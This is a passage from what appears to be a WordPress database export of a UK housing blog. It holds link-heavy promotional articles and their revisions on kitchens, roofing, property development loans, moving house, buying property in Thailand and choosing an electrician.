href=\"https://www.pinterest.co.uk/thetileshop/granite-tile/\" target=\"_blank\" rel=\"noopener noreferrer\">granite floor tiles</a> which can instantly add character to any room, whatever the style. As it is quite difficult to make a decision over the internet on which flooring will be the right ones for you we are here to help you create your perfect kitchen.\n\n<a href=\"http://www.besthomekitchenstuff.co.uk/different-types-flooring-homes/\" target=\"_blank\" rel=\"noopener noreferrer\">The Different Types of Flooring For Homes | What is the Best Flooring?</a>\n\n<img class=\"alignnone wp-image-71\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1.jpg\" alt=\"\" width=\"192\" height=\"128\" /><img class=\"alignnone wp-image-72\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/interior-design-2047075_960_720.jpg\" alt=\"\" width=\"171\" height=\"128\" /> <img class=\"alignnone wp-image-73\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2165756_960_720.jpg\" alt=\"\" width=\"196\" height=\"129\" /> <img class=\"alignnone wp-image-74\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/kitchen-2486092_960_720.jpg\" alt=\"\" width=\"195\" height=\"131\" /><img class=\"alignnone wp-image-77\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/retro-3249927_960_720.jpg\" alt=\"\" width=\"195\" height=\"130\" /> <img class=\"alignnone wp-image-78\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/wood-fibre-boards-2928524_960_720.jpg\" alt=\"\" width=\"194\" height=\"129\" />\n\nDepending on your taste and the style of your kitchen it would be useful for you to already have an idea of which floor you would like to purchase.\n\nHardwood,<em> bamboo,</em> engineered timber, laminate, vinyl are <em><strong>all types of flooring</strong> </em>that you can choose from to enhance your kitchen at Timber Flooring Online. <a href=\"https://timberflooringonline.net.au/shop/\" target=\"_blank\" rel=\"noopener noreferrer\">Find out more</a>.\n\nSome things you would have to consider when planning to purchase a new style of flooring is the overall thickness of a product. You can find out more about the <em><strong>types of timber flooring</strong> </em>that are best suitable for your kitchen.\n<h2>Use up-to-date plumbing systems</h2>\n<a href=\"https://www.thebalance.com/steps-to-remodeling-your-kitchen-1798738\" target=\"_blank\" rel=\"noopener noreferrer\">Renovating your kitchen</a> can be made easier by upgrading any existing or out-of-date plumbing systems.\n\nNot only will the most recent plumbing systems improve the look of your kitchen, they will also ensure that water is heated and used efficiently to save energy and utilities costs.\n\nUse a recommended plumber to assist you with your kitchen installation. <a href=\"https://thejandpgroup.co.uk/plumbers-london/refurbishments/kitchen-installation\" target=\"_blank\" rel=\"noopener noreferrer\">More here. </a>\n\n<img class=\"alignnone wp-image-80\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers.jpg\" alt=\"\" width=\"341\" height=\"230\" /> <img class=\"alignnone wp-image-81\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/White-Modern-Kitchen.jpg\" alt=\"\" width=\"387\" height=\"228\" />','Creating your perfect kitchen','','inherit','closed','closed','','15-revision-v1','','','2021-02-01 12:26:04','2021-02-01 12:26:04','',15,'https://housing-today.co.uk/blog/15-revision-v1',0,'revision','',0),(274,1,'2021-03-09 11:56:14','2021-03-09 11:56:14','Your roof is the largest feature on the outside of your home - without being well maintained this can have <a href=\"http://www.buildings.com/article-details/articleid/1735/title/the-top-10-most-common-roof-problems\" target=\"_blank\" rel=\"noopener noreferrer\">serious effects</a> on the <a href=\"https://housing-today.co.uk/interior-design-at-home/\">interior of your house</a>, as well as the outside. It even pays off to have an attractive build as it improves the look of your house and can change it into something much different.\r\n<h2>So what type of roof can do it best?</h2>\r\nThe installation of a flat roof can transform your home from being drab and boring, to the most exciting house on the block.\r\n\r\n<strong>We have been providing roofing advice in Suffolk for many years.<a href=\"http://elcroofing.co.uk/suffolk/Felixstowe\" target=\"_blank\" rel=\"noopener noreferrer\"><img class=\"alignright\" style=\"margin: 10px;\" src=\"http://housing-today.co.uk/wp-content/uploads/2016/11/roof-plate.jpg\" alt=\"roof-plate\" width=\"50%\" height=\"auto\" align=\"right\" /></a></strong>\r\n\r\n<strong>A </strong><strong>New Flat Roof</strong> installed in Felixstowe, Suffolk can <a href=\"https://www.homebuilding.co.uk/flat-roofs/\" target=\"_blank\" rel=\"noopener noreferrer\">provide real benefits</a>, warmer and more comfortable rooms, <a href=\"https://www.angieslist.com/articles/5-ways-new-roof-can-save-you-money.htm\" target=\"_blank\" rel=\"noopener noreferrer\">lower energy bills</a> and an improved HIP rating for a start.\r\n\r\n<a href=\"http://www.trademansblog.co.uk/flat-roofing-materials/\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>Flat Roof Options:</strong></a>\r\n<ul>\r\n <li>Alwitra single ply membrane - The ultimate system in flat roofing</li>\r\n <li>Firestone - A one piece flat roofing system</li>\r\n <li>Tectofin RV - Acrylic synthetic rubber method</li>\r\n <li>Fibre Glass - No leaks, no rotting and non slip</li>\r\n <li>Liquid Rubber - For a seamless waterproof membrane</li>\r\n <li>EPDM rubber roofing - Lasts up to 50 years</li>\r\n <li>Asphalt - Continuous waterproof covering</li>\r\n <li>Anderson torch-on - High performance approved layers</li>\r\n <li>High performance Built Up Felt - 180 and 250 polyester</li>\r\n</ul>\r\nOur target is to provide you with the best possible <a href=\"http://elcroofing.co.uk/suffolk/Felixstowe\" target=\"_blank\" rel=\"noopener noreferrer\">flat roofing solutions</a> which will both enhance the look of your home, and protect it from the elements.\r\n<h2>Embrace Your Outdoor Space with Blinds and Awnings</h2>\r\nAnother dependable solution for expanding your home into the great outdoors is to buy and install an awning to the exterior of your home. You’ll be surprised at the contemporary designs available. If you’re really looking to revitalise your outdoor space, <a href=\"https://shadeland.com.au/blinds-awnings/\" target=\"_blank\" rel=\"noopener noreferrer\">blinds and awnings</a> make a great combination.\r\n\r\nBy browsing and purchasing blinds and awnings made of the highest quality, you can ensure that they’ll guarantee you maximum protection from the sun, even on the hottest days!\r\n\r\nIf you’re looking for something to provide shade across a large area, <a href=\"https://shadeland.com.au/shade-sails-structures/\" target=\"_blank\" rel=\"noopener noreferrer\">shade sails</a> might be exactly what you’re looking for.','Creating The Perfect Outside','','inherit','closed','closed','','19-revision-v1','','','2021-03-09 11:56:14','2021-03-09 11:56:14','',19,'http://housing-today.co.uk/blog/19-revision-v1',0,'revision','',0),(282,1,'2021-08-06 13:29:01','2021-08-06 13:29:01','<!-- wp:paragraph -->\r\n<p>There are property developers who are either new to the market or experienced at developing residential and commercial properties.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Regardless if it\'s your first time building a house or not, a financial loan will give you the right amount of money to cover your development project.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>As more financial loan providers for project developments are becoming popular, more people are looking into taking out a property development loan.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>This is so they can begin the process of developing a property that they can put on the market once it is complete.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Why don\'t people use their own money?</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Investing your own money in a property development project <a href=\"https://www.nibusinessinfo.co.uk/content/advantages-and-disadvantages-using-your-own-money-start-business\" target=\"_blank\" rel=\"noreferrer noopener\">has plenty of risks</a>:</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:list -->\r\n<ul>\r\n<li>You may never make a profit or your own money back</li>\r\n<li>You may not be able to afford the costs of the property production</li>\r\n<li>You may be at risk of losing your possessions if the project is not a success</li>\r\n</ul>\r\n<!-- /wp:list -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Using your own money may also not be an option for first-time developers or developers that do not have large sums of money to put up for the project development.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>It may make more sense for a property developer to take out a loan because they believe the advantages will be significant and make a difference to their project.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Helps your credit</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Taking out any loan can help improve someone\'s credit.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If your credit is at a good level when applying for a finance loan for a property development project, it is likely to increase as long as the repayment criteria are met.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Gives everyone a chance</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Financial loans for property developments are given only to experienced individuals.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Many loan providers do not <a href=\"https://www.hunterfinance.co.uk/development-finance/lending-criteria/\" target=\"_blank\" rel=\"noreferrer noopener\">have specific lending criteria</a> and can provide a quick \'yes\' or \'no\' response to their loan application.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>While banks may focus on specific criteria like credit score and history in the industry, alternative loan providers will focus on the potential and give an answer based on the potential of the project rather than be given an answer from a computer.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Allows for big projects to be made</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Producing any property development is expensive, especially ones that are on a larger scale and require more money to be used on staff, resources and repairs!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Property developers can use financial loans to do larger-scale projects that they may not have been accepted for in the past.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Producing bigger projects is valuable for the property developer, the lender and also the local community!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Be sure to research what financial loan will be perfect for you.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>As each property developer has their specific criteria regarding their expectations and wants from a property loan - it is essential you ask around for more information and don\'t be afraid to ask questions.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>More</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"level\":1} --><!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><a href=\"https://www.jaevee.co.uk/how-to-get-into-property-development\" target=\"_blank\" rel=\"noreferrer noopener\">How To Get Into Property Development in the UK</a></p>\r\n<p><a href=\"https://www.progressiveproperty.co.uk/83968-2/\" target=\"_blank\" rel=\"noopener\">Invest in property using none of your own money</a></p>\r\n<!-- /wp:paragraph -->','How all property developers benefit from financial loans','','publish','closed','closed','','how-all-property-developers-benefit-from-financial-loans','','','2021-08-06 13:32:48','2021-08-06 13:32:48','',0,'https://housing-today.co.uk/?p=282',0,'post','',0),(283,1,'2021-08-06 12:08:09','2021-08-06 12:08:09','<!-- wp:paragraph -->\n<p>There are property developers who are either new to the market or experienced at developing residential and commercial properties.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Regardless if it\'s your first time building a house or not, a financial loan will give you the right amount of money to cover your development project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As more financial loan providers for project developments are becoming popular, more people are looking into taking out a property development loan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is so they can begin the process of developing a property that they can put on the market once it is complete.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Why don\'t people use their own money?</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Investing your own money in a property development project <a target=\"_blank\" href=\"https://www.nibusinessinfo.co.uk/content/advantages-and-disadvantages-using-your-own-money-start-business\" rel=\"noreferrer noopener\">has plenty of risks</a>:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>You may never make a profit or your own money back</li><li>You may not be able to afford the costs of the property production</li><li>You may be at risk of losing your possessions if the project is not a success</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Using your own money may also not be an option for first-time developers or developers that do not have large sums of money to put up for the project development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It may make more sense for a property developer to take out a loan because they believe the advantages will be significant and make a difference to their project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Helps your credit</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Taking out any loan can help improve someone\'s credit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If your credit is at a good level when applying for a finance loan for a property development project, it is likely to increase as long as the repayment criteria are met.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Gives everyone a chance</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Financial loans for property developments are given only to experienced individuals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many loan providers do not <a target=\"_blank\" href=\"https://www.hunterfinance.co.uk/development-finance/lending-criteria/\" rel=\"noreferrer noopener\">have specific lending criteria</a> and can provide a quick \'yes\' or \'no\' response to their loan application.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>While banks may focus on specific criteria like credit score and history in the industry, alternative loan providers will focus on the potential and give an answer based on the potential of the project rather than be given an answer from a computer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Allows for big projects to be made</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Producing any property development is expensive, especially ones that are on a larger scale and require more money to be used on staff, resources and repairs!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Property developers can use financial loans to do larger-scale projects that they may not have been accepted for in the past.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Producing bigger projects is valuable for the property developer, the lender and also the local community!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Be sure to research what financial loan will be perfect for you.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As each property developer has their specific criteria regarding their expectations and wants from a property loan - it is essential you ask around for more information and don\'t be afraid to ask questions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>More</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1><a target=\"_blank\" href=\"https://www.progressiveproperty.co.uk/83968-2/\" rel=\"noreferrer noopener\">Invest in property using none of your own money</a></h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a target=\"_blank\" href=\"https://www.jaevee.co.uk/how-to-get-into-property-development\" rel=\"noreferrer noopener\">How To Get Into Property Development in the UK</a></p>\n<!-- /wp:paragraph -->','How all property developers benefit from financial loans','','inherit','closed','closed','','282-revision-v1','','','2021-08-06 12:08:09','2021-08-06 12:08:09','',282,'https://housing-today.co.uk/?p=283',0,'revision','',0),(284,1,'2021-08-06 13:28:54','2021-08-06 13:28:54','property developers','property developers','','inherit','closed','closed','','building-768815_1920','','','2021-08-06 13:32:44','2021-08-06 13:32:44','',282,'http://housing-today.co.uk/wp-content/uploads/2021/08/building-768815_1920.jpg',0,'attachment','image/jpeg',0),(285,1,'2021-08-06 13:29:01','2021-08-06 13:29:01','<!-- wp:paragraph -->\r\n<p>There are property developers who are either new to the market or experienced at developing residential and commercial properties.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Regardless if it\'s your first time building a house or not, a financial loan will give you the right amount of money to cover your development project.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>As more financial loan providers for project developments are becoming popular, more people are looking into taking out a property development loan.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>This is so they can begin the process of developing a property that they can put on the market once it is complete.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Why don\'t people use their own money?</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Investing your own money in a property development project <a href=\"https://www.nibusinessinfo.co.uk/content/advantages-and-disadvantages-using-your-own-money-start-business\" target=\"_blank\" rel=\"noreferrer noopener\">has plenty of risks</a>:</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:list -->\r\n<ul>\r\n<li>You may never make a profit or your own money back</li>\r\n<li>You may not be able to afford the costs of the property production</li>\r\n<li>You may be at risk of losing your possessions if the project is not a success</li>\r\n</ul>\r\n<!-- /wp:list -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Using your own money may also not be an option for first-time developers or developers that do not have large sums of money to put up for the project development.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>It may make more sense for a property developer to take out a loan because they believe the advantages will be significant and make a difference to their project.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Helps your credit</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Taking out any loan can help improve someone\'s credit.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>If your credit is at a good level when applying for a finance loan for a property development project, it is likely to increase as long as the repayment criteria are met.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Gives everyone a chance</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Financial loans for property developments are given only to experienced individuals.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Many loan providers do not <a href=\"https://www.hunterfinance.co.uk/development-finance/lending-criteria/\" target=\"_blank\" rel=\"noreferrer noopener\">have specific lending criteria</a> and can provide a quick \'yes\' or \'no\' response to their loan application.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>While banks may focus on specific criteria like credit score and history in the industry, alternative loan providers will focus on the potential and give an answer based on the potential of the project rather than be given an answer from a computer.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>Allows for big projects to be made</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Producing any property development is expensive, especially ones that are on a larger scale and require more money to be used on staff, resources and repairs!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Property developers can use financial loans to do larger-scale projects that they may not have been accepted for in the past.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Producing bigger projects is valuable for the property developer, the lender and also the local community!</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Be sure to research what financial loan will be perfect for you.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>As each property developer has their specific criteria regarding their expectations and wants from a property loan - it is essential you ask around for more information and don\'t be afraid to ask questions.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><strong>More</strong></p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:heading {\"level\":1} --><!-- /wp:heading -->\r\n\r\n<!-- wp:paragraph -->\r\n<p><a href=\"https://www.jaevee.co.uk/how-to-get-into-property-development\" target=\"_blank\" rel=\"noreferrer noopener\">How To Get Into Property Development in the UK</a></p>\r\n<p><a href=\"https://www.progressiveproperty.co.uk/83968-2/\" target=\"_blank\" rel=\"noopener\">Invest in property using none of your own money</a></p>\r\n<!-- /wp:paragraph -->','How all property developers benefit from financial loans','','inherit','closed','closed','','282-revision-v1','','','2021-08-06 13:29:01','2021-08-06 13:29:01','',282,'https://housing-today.co.uk/?p=285',0,'revision','',0),(287,1,'2021-08-20 13:27:51','2021-08-20 13:27:51','<h2><a href=\"/\"><span data-preserver-spaces=\"true\">Start unpacking</span></a></h2>\r\n<span data-preserver-spaces=\"true\">The </span><strong><span data-preserver-spaces=\"true\">first thing that has to be undone</span></strong><span data-preserver-spaces=\"true\"> is all of the box unpacking.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It\'s often the most boring and long part of the job - but it is the most important and already has your house looking more like your home.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Many people do it in different ways. Some may do it in order of the biggest box to the smallest box, whilst some others may do it on a room-to-room basis.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever is easier for you is </span><span data-preserver-spaces=\"true\">the best way to do it</span><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Hint: </span><em><span data-preserver-spaces=\"true\">always be sure to label your boxes before your move so it saves you time.</span></em>\r\n<iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/N6_tYHy4AFE\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h2><span data-preserver-spaces=\"true\">Do a full-house cleaning</span></h2>\r\n<span data-preserver-spaces=\"true\">When you are done with the unpacking you might notice exactly how much rubbish is in the house. No one expects it to have so much rubbish, but it\'s always best to be prepared.</span>\r\n\r\n<strong>Regardless if you do it after unpacking a room, or after the whole house is unpacked, it would be beneficial to do a <a class=\"editor-rtfLink\" href=\"https://prohousekeepers.com/blog/essential-cleaning-to-dos-before-you-start-unpacking-your-new-home/\" target=\"_blank\" rel=\"noopener\">full-house clean up</a> and put all the unwanted items to one side.</strong>\r\n\r\n<em>The hardest thing to get rid of when cleaning is all the unwanted rubbish and waste that takes up a lot of room.</em>\r\n\r\n<span data-preserver-spaces=\"true\">Rubbish Clearance is a <a href=\"http://rubbish.me.uk/services/rubbish-clearance\" target=\"_blank\" rel=\"noopener\">rubbish removal expert</a> and has been providing their waste removal services across the UK for many years. </span>\r\n<blockquote><span data-preserver-spaces=\"true\">Why take the chance of doing your rubbish removal which will require your own time and resources? Rubbish Clearance is the specialists at getting rid of household waste in time for a new move. </span></blockquote>\r\n<h2><span data-preserver-spaces=\"true\">Make a list of things to do the next day</span></h2>\r\n<span data-preserver-spaces=\"true\">Moves are tiring and not everything can be done within one day.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever you can\'t do on a moving day, make a note of the remainder of </span><a class=\"editor-rtfLink\" href=\"https://hoa.org.uk/2019/04/10-ways-to-settle-into-your-new-neighbourhood/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">things that you have not yet done</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It might be small things like:</span>\r\n<ul>\r\n <li><span data-preserver-spaces=\"true\">Say hi to all of the new neighbours</span></li>\r\n <li><span data-preserver-spaces=\"true\">Inform banks, work and schools about the new address</span></li>\r\n <li><span data-preserver-spaces=\"true\">Stock up on enough food to keep the household fed for a week</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Don\'t focus on doing everything in one day. Fully moving into a new house takes time, so do as much as you can on the first day and get the remainder done in the following days.</span>\r\n<h2><span data-preserver-spaces=\"true\">More</span></h2>\r\n<ul>\r\n <li><a class=\"editor-rtfLink\" href=\"https://www.moving.com/tips/36-moving-hacks-faster-easier-less-stressful-move/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">36 Moving Hacks for a Faster, Easier, and Less Stressful Move | Moving.com</span></a></li>\r\n <li><a class=\"editor-rtfLink\" href=\"https://makespace.com/blog/posts/moving-packing-tips/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">41 Moving And Packing Tips To Make Your Move Dead Simple | Make Space</span></a></li>\r\n <li><a class=\"editor-rtfLink\" href=\"https://www.housebeautiful.com/uk/renovate/a1531/real-truth-about-moving-house/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What Nobody Tells You About Moving House - Moving House Tips | House Beautiful</span></a></li>\r\n</ul>','Getting your new home ready after a move','','publish','closed','closed','','getting-your-new-home-ready-after-a-move','','','2021-08-24 13:31:26','2021-08-24 13:31:26','',0,'https://housing-today.co.uk/?p=287',0,'post','',0),(288,1,'2021-08-20 13:27:51','2021-08-20 13:27:51','','Getting your new home ready after a move','','inherit','closed','closed','','287-revision-v1','','','2021-08-20 13:27:51','2021-08-20 13:27:51','',287,'https://housing-today.co.uk/?p=288',0,'revision','',0),(289,1,'2021-08-20 13:29:15','2021-08-20 13:29:15','<h1>Moving abroad can be daunting, from the pressure of finding the right area and property for you to arranging dates and sorting out the legal side of things.</h1>\r\nBelow is a list of the key factors you need to take into consideration, in order to make the process as easy as possible.\r\n<h2><a href=\"https://www.thaiembassy.com/thailand/buying-realestate-thailand.php\" target=\"_blank\" rel=\"noopener\">Understanding Thai property Law</a></h2>\r\nThe laws on owning land and properties in each country vary, Thailand is no exception.\r\n\r\nYou must make sure you know and understand Thai property and land laws.\r\n\r\nUnder existing laws, there are complications that hinder foreigners owning property in Thailand.\r\n<h2>Legal Representation</h2>\r\nUnfortunately, when it comes to moving abroad, foreigners are often misled, even by legal professionals, therefore, it is important to make sure you get the best legal representation you can. <a href=\"https://juslaws.com/our-people.php\" target=\"_blank\" rel=\"noopener\">More.</a>\r\n<blockquote>It is vital that you have all of the legal factors of your move complete.</blockquote>\r\nYou can find out more about the legalities of property and of course <a href=\"https://muangthai-realestate.com/properties/\">a wide range of property types for sale</a> in Thailand through local Thai estate agents.\r\n<h2>Take your time</h2>\r\nTime is key in any move, let alone abroad. Rushing into it will only make the process longer and harder.\r\n\r\nWhilst the legal side of things is the most important part, making sure that you take the time to research the various areas and <a href=\"https://muangthai-realestate.com/properties/\" target=\"_blank\" rel=\"noopener\">properties available to you</a>.\r\n<h2><img class=\"size-medium wp-image-150 alignleft\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/08/thai-property-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />Get to know your agent</h2>\r\nA fundamental part of moving is the <strong>estate agent.</strong> Choosing the right real estate agent is a process within itself.\r\n\r\nYou should always ask to see their developers previous work. Make sure you are aware of the way they treat you, if they communicate well or if they try to pressure you into making decisions.\r\n\r\nWhilst they want to sell you the property, they may not do it with the best intentions, so it is vital that you spend time finding the right agent for you.','Top tips for purchasing property in Thailand','','inherit','closed','closed','','135-revision-v1','','','2021-08-20 13:29:15','2021-08-20 13:29:15','',135,'https://housing-today.co.uk/?p=289',0,'revision','',0),(290,1,'2021-08-20 13:29:21','2021-08-20 13:29:21','<h2>Five key things to consider when choosing an electrician</h2>\r\n<div id=\"boxed-wrapper\">\r\n<div id=\"wrapper\" class=\"fusion-wrapper\">\r\n<div class=\"fusion-row\"><section id=\"content\"><article id=\"post-12015\" class=\"post post-12015 type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized\">\r\n<div class=\"post-content\">\r\n\r\n<span id=\"more-12015\"><img class=\"size-medium wp-image-99 alignleft\" src=\"http://housing-today.co.uk/wp-content/uploads/2019/06/fibre-optic-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" /></span>\r\n\r\nIt can be difficult to find the right tradesperson for you when having any work done in your home, especially when you want quality work for a good price. Below are the five most important factors to consider when choosing an electrician\r\n\r\n \r\n<h3>Right tradesman</h3>\r\nThe number one factor to consider when choosing a contractor is whether they are authorised to do the job. Having a licensed tradesperson guarantees that the job will be done safely and correctly as they will have all of the necessary training and qualifications.\r\n\r\nYou should always ask for the relevant information and documents, such as a license and insurance. They must be in date. You should be aware that some licenses and insurance have restrictions so it is important to check that they cover the work you need to be done. <a href=\"https://housing-today.co.uk/contact-housing-today\">Contact us for more information.</a>\r\n<h3>Qualifications and experience</h3>\r\nAll tradespeople work at different levels, therefore it is important to know what level your electrician can work at. Master electricians have a minimum of three years experience and guarantee a 12-month warranty on their work. <a href=\"https://www.tradeskills4u.co.uk/pages/electrician-courses\" target=\"_blank\" rel=\"noopener\">NVQ & Courses for Fully Qualified Electricians Explained.</a>\r\n\r\nOf course, choosing a master electrician means you will be paying a higher fee, but it secures you the highest quality of workmanship and safety. This also means that they will have additional knowledge and can advise you on ways to be energy efficient in order to save money in the future.\r\n<h3>Value for money</h3>\r\nIn general, you should get at least three different quotes, this way you can asses each potential contractor and decide which one suits your requirements best.\r\n<blockquote>A price breakdown is advised within the quote so that the comparisons can be clear and precise and you can consider important factors such as the cost of materials, labour, etc.</blockquote>\r\n<h3>Reviews</h3>\r\nGetting a recommendation from a previous user of their service is always important, especially if you know and trust their opinion as this ensures that they provide a good service. If you cant get a personal recommendation, you can always ask them for a referee or you can check their online reviews, although you must be wary of this option as they are not always genuine.\r\n<h3>Attitude and communication</h3>\r\nIt is important to take note of the attitude and communication skills of your contractor. Things to take into consideration include punctuality to the quote, their appearance, if they have good communication skills, for example, confidence in talking to you about the job and ability to answer any questions you have.\r\n<h3>Choosing the right electrician checklist:</h3>\r\n<ul>\r\n <li>fully licensed and insured</li>\r\n <li>a fair quote</li>\r\n <li>experience in your specific needs</li>\r\n <li>are they recommended</li>\r\n <li>are they a professional</li>\r\n</ul>\r\n<div class=\"fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling\">\r\n<div class=\"fusion-builder-row fusion-row \">\r\n<div class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last 